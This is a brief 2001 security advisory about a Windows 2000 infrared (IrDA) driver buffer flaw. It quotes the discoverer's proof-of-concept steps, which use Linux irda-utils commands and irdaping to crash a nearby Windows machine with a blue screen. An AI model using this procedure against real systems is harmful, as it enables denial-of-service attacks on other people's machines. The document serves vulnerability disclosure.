Reported August 21, 2001, by Microsoft.
· Windows 2000
An unchecked buffer exists in the Infrared Data Association (IrDA) driver that can cause a Denial of Service (DoS) condition. A system running Win2K with infrared support turned on can crash when it receives an IrDA test frame from a Linux system that is using the irdaping utility.
Paul Millar, who discovered the vulnerability, posted the following scenario as proof-of-concept:
1. Startup laptops. My setup was: victim running Windows, protagonist
running GNU/Linux. The Linux kernel must have IrDA support
2. Under GNU/Linux, make sure irda-utils-0.9.10-9 is installed, other
versions are untested, but will probably work too.
3. Do "irattach /dev/ttyS1 -s" or equivalent to activate the IrDA
4. Check the GNU/Linux side its working correctly by running the
"irdadump" command. You should see repetitive output similar to:
07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)
07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)
07:28:17.970845 xid:cmd 4d274896 > ffffffff S=6 s=2 (14)
07:28:18.060858 xid:cmd 4d274896 > ffffffff S=6 s=3 (14)
07:28:18.150840 xid:cmd 4d274896 > ffffffff S=6 s=4 (14)
07:28:18.240861 xid:cmd 4d274896 > ffffffff S=6 s=5 (14)
07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 \[ Computer \] (28)
5. Place laptops so the infrared ports are aligned and within IrDA
distance, irdadump should reflect new machine. The Windows
machine should also respond, usually by making a sound.
6. Run irdaping. The destination address ("0x4d274896"
for above example) is required, but actual value doesn't matter.
The vulnerable system at this point will either crash with a blue screen or will reboot, depending upon the system’s configuration.
Discovered by Paul Millar.